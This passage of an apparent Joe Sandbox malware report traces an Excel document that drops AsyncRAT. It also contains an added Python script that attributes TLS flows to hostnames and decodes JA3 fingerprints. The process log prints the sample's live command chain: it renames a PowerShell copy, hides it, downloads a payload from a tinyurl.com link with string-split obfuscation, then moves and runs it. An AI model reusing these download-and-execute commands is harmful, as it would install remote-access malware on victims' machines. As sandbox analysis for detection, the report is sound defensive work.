  CN=COMODO RSA Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | Thu Sep 25 02:00:00 CEST 2014 | Tue Sep 25 01:59:59 CEST 2029
  CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB | Thu Jan 01 01:00:00 CET 2004 | Mon Jan 01 00:59:59 CET 2029
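The DNS and HTTPS tables above only make sense together: both TLS flows terminate at Cloudflare, whose leaf certificates (sni.cloudflaressl.com, ssl711319.cloudflaressl.com) say nothing about which hostname the sample actually contacted, so the hostname has to be recovered by matching each flow's server IP against the A records the sandbox saw just before the flow started. The script below is an added example, not part of the Joe Sandbox report or its tooling. The DNS answers, TLS flows and JA3 values are transcribed from the tables in this report; the shortener and payload-host watch lists, the record shapes and the function names are assumptions made for the example.

```python
"""Attribute the report's TLS flows to hostnames via passive DNS and decode its JA3 string.

Added example, not part of the Joe Sandbox report. Sample rows are transcribed
from the DNS Answers and HTTPS Packets tables above; watch lists are assumed.
"""
import hashlib
from datetime import datetime

TS = "%Y-%m-%d %H:%M:%S.%f"

# (answer timestamp, queried name, A record) transcribed from the DNS Answers table.
DNS_ANSWERS = [
    ("2020-11-19 09:32:52.661617", "tinyurl.com", "104.20.138.65"),
    ("2020-11-19 09:32:52.661617", "tinyurl.com", "104.20.139.65"),
    ("2020-11-19 09:32:52.661617", "tinyurl.com", "172.67.1.225"),
    ("2020-11-19 09:32:53.456526", "cdn.discordapp.com", "162.159.129.233"),
    ("2020-11-19 09:32:53.456526", "cdn.discordapp.com", "162.159.130.233"),
]

# (flow timestamp, server IP, client port, leaf certificate CN) from the HTTPS Packets table.
TLS_FLOWS = [
    ("2020-11-19 09:32:52.833199", "104.20.138.65", 49733, "sni.cloudflaressl.com"),
    ("2020-11-19 09:32:53.492600", "162.159.129.233", 49734, "ssl711319.cloudflaressl.com"),
]

# JA3 string and digest shown for both flows in the report.
JA3_STRING = "769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0"
JA3_DIGEST = "54328bd36c14bd82ddaa0c04b25ed9ad"

# Watch lists (assumed for this example): a shortener hides the real payload URL,
# and a public CDN is a common free host for the second stage.
URL_SHORTENERS = {"tinyurl.com", "bit.ly", "is.gd"}
PAYLOAD_HOSTS = {"cdn.discordapp.com"}

# IANA cipher-suite and version numbers that occur in the report's JA3 string.
CIPHER_NAMES = {
    49162: "TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA",
    49161: "TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA",
    49172: "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA",
    49171: "TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA",
    53: "TLS_RSA_WITH_AES_256_CBC_SHA",
    47: "TLS_RSA_WITH_AES_128_CBC_SHA",
    10: "TLS_RSA_WITH_3DES_EDE_CBC_SHA",
}
TLS_VERSIONS = {769: "TLS 1.0", 770: "TLS 1.1", 771: "TLS 1.2"}


def hostname_for(ip, at, answers=DNS_ANSWERS):
    """Name that most recently resolved to `ip` at or before time `at`, else None."""
    when = datetime.strptime(at, TS)
    prior = [(datetime.strptime(ts, TS), name) for ts, name, addr in answers
             if addr == ip and datetime.strptime(ts, TS) <= when]
    return max(prior)[1] if prior else None


def classify(hostname):
    """Verdict for an attributed hostname; None means no DNS answer preceded the flow."""
    if hostname is None:
        return "no-dns-attribution"
    if hostname in URL_SHORTENERS:
        return "url-shortener"
    if hostname in PAYLOAD_HOSTS:
        return "public-cdn-payload-host"
    return "unclassified"


def attribute_flows(flows=TLS_FLOWS, answers=DNS_ANSWERS):
    """One record per TLS flow: the hostname recovered from passive DNS plus a verdict."""
    records = []
    for ts, ip, port, cn in flows:
        host = hostname_for(ip, ts, answers)
        records.append({"client_port": port, "server_ip": ip, "cert_cn": cn,
                        "hostname": host, "verdict": classify(host)})
    return records


def decode_ja3(ja3):
    """Split a JA3 string into its five comma-separated fields and name what can be named."""
    def ints(field):
        return [int(x) for x in field.split("-")] if field else []
    version, ciphers, extensions, groups, point_formats = ja3.split(",")
    return {
        "version": TLS_VERSIONS.get(int(version), version),
        "ciphers": [CIPHER_NAMES.get(c, str(c)) for c in ints(ciphers)],
        "extensions": ints(extensions),
        "groups": ints(groups),
        "point_formats": ints(point_formats),
    }


def ja3_digest(ja3):
    """The JA3 digest is defined as the MD5 of the JA3 string."""
    return hashlib.md5(ja3.encode("ascii")).hexdigest()


if __name__ == "__main__":
    for rec in attribute_flows():
        print(rec)
    info = decode_ja3(JA3_STRING)
    print(info["version"], info["ciphers"], info["extensions"])
    print("report digest equals MD5 of report string:", ja3_digest(JA3_STRING) == JA3_DIGEST)
```

Run as is and the first flow (client port 49733) is attributed to tinyurl.com and the second (49734) to cdn.discordapp.com, matching the "Connects to a URL shortener service" signature in the report summary. The attribution is a heuristic: Cloudflare IPs are shared, so the most recent answer is only a strong hint, and an IP with no preceding A record (for example a flow that started before the answer arrived) gets "no-dns-attribution" rather than a guess. The JA3 decode shows a TLS 1.0 ClientHello version with CBC-only suites, which is worth keeping alongside the digest when writing a detection, since the digest alone cannot be read by a human reviewer.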

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

Behavior

System Behavior

General

Start time: 09:31:41
Start date: 19/11/2020
Path: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase: 0x60000
File size: 27110184 bytes
MD5 hash: 5D6638F2C8F8571C593999C58866007E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 09:31:46
Start date: 19/11/2020
Path: C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:cmd.exe /c robocopy %windir%\system32\WindowsPowerShell\v1.0\ %temp% powershell.exe /mt /z & exit
                                                                                                                                                                                                                            Imagebase:0xbd0000
                                                                                                                                                                                                                            File size:232960 bytes
                                                                                                                                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Start time:09:31:46
                                                                                                                                                                                                                            Start date:19/11/2020
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:cmd /c timeout /t 1 & cd %temp% & ren powershell.exe o.exe & exit
                                                                                                                                                                                                                            Imagebase:0xbd0000
                                                                                                                                                                                                                            File size:232960 bytes
                                                                                                                                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Start time:09:31:46
                                                                                                                                                                                                                            Start date:19/11/2020
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff6b2800000
                                                                                                                                                                                                                            File size:625664 bytes
                                                                                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Start time:09:31:47
                                                                                                                                                                                                                            Start date:19/11/2020
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:cmd /c %temp%\o.exe -w 1 cd $env:temp; Start-Sleep 3; (get-item o.exe).Attributes += 'Hidden'
                                                                                                                                                                                                                            Imagebase:0xbd0000
                                                                                                                                                                                                                            File size:232960 bytes
                                                                                                                                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Start time:09:31:47
                                                                                                                                                                                                                            Start date:19/11/2020
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff6b2800000
                                                                                                                                                                                                                            File size:625664 bytes
                                                                                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Start time:09:31:47
                                                                                                                                                                                                                            Start date:19/11/2020
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff6b2800000
                                                                                                                                                                                                                            File size:625664 bytes
                                                                                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Start time:09:31:47
                                                                                                                                                                                                                            Start date:19/11/2020
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\Robocopy.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:robocopy C:\Windows\system32\WindowsPowerShell\v1.0\ C:\Users\user\AppData\Local\Temp powershell.exe /mt /z
                                                                                                                                                                                                                            Imagebase:0x170000
                                                                                                                                                                                                                            File size:103936 bytes
                                                                                                                                                                                                                            MD5 hash:BB8F54AE10FDA174289A4A495809EB69
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Start time:09:31:47
                                                                                                                                                                                                                            Start date:19/11/2020
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:timeout /t 1
                                                                                                                                                                                                                            Imagebase:0x11a0000
                                                                                                                                                                                                                            File size:26112 bytes
                                                                                                                                                                                                                            MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Start time:09:31:50
                                                                                                                                                                                                                            Start date:19/11/2020
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:cmd /c %temp%\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
                                                                                                                                                                                                                            Imagebase:0xbd0000
                                                                                                                                                                                                                            File size:232960 bytes
                                                                                                                                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Start time:09:31:50
                                                                                                                                                                                                                            Start date:19/11/2020
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:cmd /c %temp%\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata'
                                                                                                                                                                                                                            Imagebase:0xbd0000
                                                                                                                                                                                                                            File size:232960 bytes
                                                                                                                                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Start time:09:31:50
                                                                                                                                                                                                                            Start date:19/11/2020
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff6b2800000
                                                                                                                                                                                                                            File size:625664 bytes
                                                                                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Start time:09:31:50
                                                                                                                                                                                                                            Start date:19/11/2020
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:cmd /c %temp%\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;
                                                                                                                                                                                                                            Imagebase:0xbd0000
                                                                                                                                                                                                                            File size:232960 bytes
                                                                                                                                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Start time:09:31:50
                                                                                                                                                                                                                            Start date:19/11/2020
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff6b2800000
                                                                                                                                                                                                                            File size:625664 bytes
                                                                                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Start time:09:31:51
                                                                                                                                                                                                                            Start date:19/11/2020
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\o.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
                                                                                                                                                                                                                            Imagebase:0x1250000
                                                                                                                                                                                                                            File size:430592 bytes
                                                                                                                                                                                                                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:.Net C# or VB.NET

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Start time:09:31:51
                                                                                                                                                                                                                            Start date:19/11/2020
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff6b2800000
                                                                                                                                                                                                                            File size:625664 bytes
                                                                                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Start time:09:31:51
                                                                                                                                                                                                                            Start date:19/11/2020
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\o.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata'
                                                                                                                                                                                                                            Imagebase:0x1250000
                                                                                                                                                                                                                            File size:430592 bytes
                                                                                                                                                                                                                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:.Net C# or VB.NET

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Start time:09:31:51
                                                                                                                                                                                                                            Start date:19/11/2020
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\o.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;
                                                                                                                                                                                                                            Imagebase:0x1250000
                                                                                                                                                                                                                            File size:430592 bytes
                                                                                                                                                                                                                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:.Net C# or VB.NET

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Start time:09:33:05
                                                                                                                                                                                                                            Start date:19/11/2020
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\vc.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\vc.exe
                                                                                                                                                                                                                            Imagebase:0x780000
                                                                                                                                                                                                                            File size:160312 bytes
                                                                                                                                                                                                                            MD5 hash:BB7C0DFD8ECC7EEBCE937A232608695F
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000020.00000002.521796499.0000000002B41000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                                            Disassembly

                                                                                                                                                                                                                            Code Analysis

                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                              C-Code - Quality: 49%
                                                                                                                                                                                                                              			E01258D90(void** _a4, short** _a8, signed int _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                              				void* _v9;
                                                                                                                                                                                                                              				wchar_t* _v16;
                                                                                                                                                                                                                              				long _v20;
                                                                                                                                                                                                                              				long _v24;
                                                                                                                                                                                                                              				long _v28;
int _v32;
void* _v36;
int _v40;
long _v44;
struct _FILETIME _v52;
void* __ebx;
void* __edi;
void* __esi;
void* __ebp;
signed int _t75;
void* _t77;
intOrPtr* _t79;
long _t81;
intOrPtr* _t85;
void* _t91;
long _t95;
intOrPtr* _t96;
long _t106;
void* _t109;
long _t110;
intOrPtr* _t111;
long _t121;
long _t125;
signed int _t127;
signed int _t128;
void* _t134;
wchar_t* _t135;
long _t138;
long _t142;
long* _t151;
void* _t157;
wchar_t* _t158;
void* _t162;
void* _t163;
signed int _t164;
intOrPtr* _t165;
void* _t166;
intOrPtr* _t167;
short** _t168;
short* _t169;
void* _t171;
signed short* _t175;
signed int _t177;
void* _t178;
void* _t181;

_t75 =  *0x1260358; // 0xc21f7063
_v8 = _t75 ^ _t177;
_v36 = 0;
if(_a4 == 0 || _a8 == 0) {
	L54:
	_t77 = 0;
	goto L52;
} else {
	_t172 = _a12;
	if(_t172 == 0) {
		goto L54;
	}
	_t79 = _a16;
	if(_t79 == 0) {
		goto L54;
	}
	_push(_t163);
	 *_t79 = 0xffffffff;
	_t164 =  *_t172;
	_t81 = RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\PowerShell", 0, 0x20019,  &_v36); // executed
	_t138 = _t81;
	if(_t138 != 0) {
		__eflags = _t138 - 2;
		if(_t138 != 2) {
			_t165 =  *0x12606d4; // 0x0
			_t172 =  *( *_t165 + 8);
			 *0x1261204(_t138, 0x14, L"SOFTWARE\\Microsoft\\PowerShell");
			 *( *( *_t165 + 8))();
		} else {
			_t85 =  *0x12606d4; // 0x0
			_t172 =  *( *_t85 + 4);
			__eflags = _t164;
			if(_t164 != 0) {
				 *0x1261204(_t85, 0, 0x27, L"SOFTWARE\\Microsoft\\PowerShell", _t164);
				 *_t172();
			} else {
				 *0x1261204(_t85, _t164, 0x1e, L"SOFTWARE\\Microsoft\\PowerShell");
				 *_t172();
			}
		}
		_t77 = 0;
		L51:
		_pop(_t163);
		L52:
		return E01259A40(_t77, _t134, _v8 ^ _t177, _t159, _t163, _t172);
	}
	_push(_t134);
	_t135 = E0125972E(0x200);
	_t181 = _t178 + 4;
	if(_t135 == 0) {
		L53:
		_v9 = 0;
		L46:
		_t91 = _v36;
		if(_t91 != 0) {
			RegCloseKey(_t91); // executed
		}
		if(_t135 != 0) {
			free(_t135);
		}
		_t77 = _v9;
		_pop(_t134);
		goto L51;
	}
	_t166 = 0;
	_v24 = 0;
	_v32 = 0x100;
	_t95 = RegEnumKeyExW(_v36, 0, _t135,  &_v32, 0, 0, 0,  &_v52); // executed
	_t142 = _t95;
	_v40 = 1;
	if(_t142 == 0x103) {
		L80:
		_t96 =  *0x12606d4; // 0x0
		_t172 =  *( *_t96 + 4);
		 *0x1261204(_t96, 0, 0x1d);
		 *( *( *_t96 + 4))();
		_t181 = _t181 + 0xc;
		goto L53;
	}
	while(_t142 == 0) {
		_v28 = 0;
		_v44 = 0;
		if(E01259200(_t135) != 0) {
			L42:
			_v32 = 0x100;
			_t106 = RegEnumKeyExW(_v36, _v40, _t135,  &_v32, 0, 0, 0,  &_v52); // executed
			_v40 = _v40 + 1;
			_t142 = _t106;
			if(_t142 != 0x103) {
				continue;
			}
			if(_t166 == 0) {
				goto L80;
			}
			_t172 = _a12;
			 *_t172 = _t166;
			_t168 = _a8;
			 *_a16 = _v24;
			_t109 = E012590D0(0x12606d0, L"SOFTWARE\\Microsoft\\PowerShell\\%1!ls!\\PowerShellEngine", _t168,  &_v16, 0x17, _t166);
			_t181 = _t181 + 0x18;
			if(_t109 == 0) {
				goto L53;
                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                              							_t169 =  *_t168;
                                                                                                                                                                                                                              							_t172 =  *_t172;
                                                                                                                                                                                                                              							_v16 = _t172;
                                                                                                                                                                                                                              							_v24 = _t169;
                                                                                                                                                                                                                              							_v9 = 1;
                                                                                                                                                                                                                              							_t110 = RegOpenKeyExW(0x80000002, _t169, 0, 0x20019, _a4); // executed
                                                                                                                                                                                                                              							_t142 = _t110;
                                                                                                                                                                                                                              							if(_t142 != 0) {
                                                                                                                                                                                                                              								__eflags = _t142 - 2;
                                                                                                                                                                                                                              								if(_t142 != 2) {
                                                                                                                                                                                                                              									_push(_v24);
                                                                                                                                                                                                                              									_push(0x14);
                                                                                                                                                                                                                              									L79:
                                                                                                                                                                                                                              									_t167 =  *0x12606d4; // 0x0
                                                                                                                                                                                                                              									_t172 =  *( *_t167 + 8);
                                                                                                                                                                                                                              									 *0x1261204(_t142);
                                                                                                                                                                                                                              									 *( *( *_t167 + 8))();
                                                                                                                                                                                                                              									goto L53;
                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                              								_t111 =  *0x12606d4; // 0x0
                                                                                                                                                                                                                              								__eflags = _t172;
                                                                                                                                                                                                                              								_t172 =  *( *_t111 + 4);
                                                                                                                                                                                                                              								if(__eflags != 0) {
                                                                                                                                                                                                                              									 *0x1261204(_t111, 0, 0x27, _t169, _v16);
                                                                                                                                                                                                                              									 *_t172();
                                                                                                                                                                                                                              									_t181 = _t181 + 0x14;
                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                              									 *0x1261204(_t111, 0, 0x1e, _t169);
                                                                                                                                                                                                                              									 *_t172();
                                                                                                                                                                                                                              									_t181 = _t181 + 0x10;
                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                              								goto L53;
                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                              							goto L46;
                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                              						_v20 = 0;
                                                                                                                                                                                                                              						if(E01259200(_t135) != 0) {
                                                                                                                                                                                                                              							goto L42;
                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                              						_v16 = wcschr(_t135, 0x2e);
                                                                                                                                                                                                                              						_t175 = wcschr(_t135, 0);
                                                                                                                                                                                                                              						_t181 = _t181 + 0x10;
                                                                                                                                                                                                                              						if(_t175 == 0) {
                                                                                                                                                                                                                              							goto L42;
                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                              						_t119 = _v16;
                                                                                                                                                                                                                              						if(_v16 != 0) {
                                                                                                                                                                                                                              							_t159 = E0125B9B5( &_v44, _t135, _t119,  &_v44);
                                                                                                                                                                                                                              							__eflags = _t159;
                                                                                                                                                                                                                              							if(_t159 == 0) {
                                                                                                                                                                                                                              								goto L42;
                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                              							_t121 = _v44;
                                                                                                                                                                                                                              							_t151 =  &(_v16[0]);
                                                                                                                                                                                                                              							L23:
                                                                                                                                                                                                                              							if(_t159 == 0 || _t151 != 0 || _t121 <= _v24) {
                                                                                                                                                                                                                              								goto L42;
                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                              								_t172 = _v32 + 1;
                                                                                                                                                                                                                              								_v24 = _t121;
                                                                                                                                                                                                                              								_t207 = _t166;
                                                                                                                                                                                                                              								if(_t166 != 0) {
                                                                                                                                                                                                                              									free(_t166);
                                                                                                                                                                                                                              									_t181 = _t181 + 4;
                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                              								_t159 = _t172 * 2 >> 0x20;
                                                                                                                                                                                                                              								_t166 = E0125972E( ~(0 | _t207 > 0x00000000) | _t172 * 0x00000002);
                                                                                                                                                                                                                              								_t181 = _t181 + 4;
                                                                                                                                                                                                                              								_v16 = _t166;
                                                                                                                                                                                                                              								if(_t166 == 0) {
                                                                                                                                                                                                                              									goto L53;
                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                              									_t125 = 0;
                                                                                                                                                                                                                              									if(_t172 == 0 || _t172 > 0x7fffffff) {
                                                                                                                                                                                                                              										_t125 = 0x80070057;
                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                              									if(_t125 < 0) {
                                                                                                                                                                                                                              										__eflags = _t172;
                                                                                                                                                                                                                              										if(_t172 != 0) {
                                                                                                                                                                                                                              											 *_t166 = 0;
                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                              										goto L41;
                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                              										_v20 = 0;
                                                                                                                                                                                                                              										_t157 = _t166;
                                                                                                                                                                                                                              										if(_t172 == 0) {
                                                                                                                                                                                                                              											L70:
                                                                                                                                                                                                                              											_t157 = _t157 - 2;
                                                                                                                                                                                                                              											_t125 = 0x8007007a;
                                                                                                                                                                                                                              											L40:
                                                                                                                                                                                                                              											_t166 = _v16;
                                                                                                                                                                                                                              											_t159 = 0;
                                                                                                                                                                                                                              											 *_t157 = 0;
                                                                                                                                                                                                                              											L41:
                                                                                                                                                                                                                              											if(_t125 < 0) {
                                                                                                                                                                                                                              												goto L53;
                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                              											goto L42;
                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                              										_t162 = 0x7ffffffe - _t172;
                                                                                                                                                                                                                              										_t171 = _t135 - _v16;
                                                                                                                                                                                                                              										while(_t162 + _t172 != 0) {
                                                                                                                                                                                                                              											_t127 =  *(_t171 + _t157) & 0x0000ffff;
                                                                                                                                                                                                                              											if(_t127 == 0) {
                                                                                                                                                                                                                              												break;
                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                              											 *_t157 = _t127;
                                                                                                                                                                                                                              											_t157 = _t157 + 2;
                                                                                                                                                                                                                              											_t172 = _t172 - 1;
                                                                                                                                                                                                                              											if(_t172 != 0) {
                                                                                                                                                                                                                              												continue;
                                                                                                                                                                                                                              											}
